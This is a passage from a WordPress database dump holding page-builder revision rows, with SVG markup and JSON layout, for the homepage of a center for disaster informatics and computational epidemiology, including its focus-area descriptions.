d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',22,'https://gsudice.dataconn.net/?p=405',0,'revision','',0),(409,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c31\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c32\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c30\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c28\",\"parentId\":\"20-c26\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c28\",\"index\":0,\"id\":\"20-c29\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c26\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',168,'https://gsudice.dataconn.net/?p=409',0,'revision','',0),(410,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c30\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c31-outer\">\n            <div data-colibri-id=\"20-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c32-outer\">\n            <div data-colibri-id=\"20-c32\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c32 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              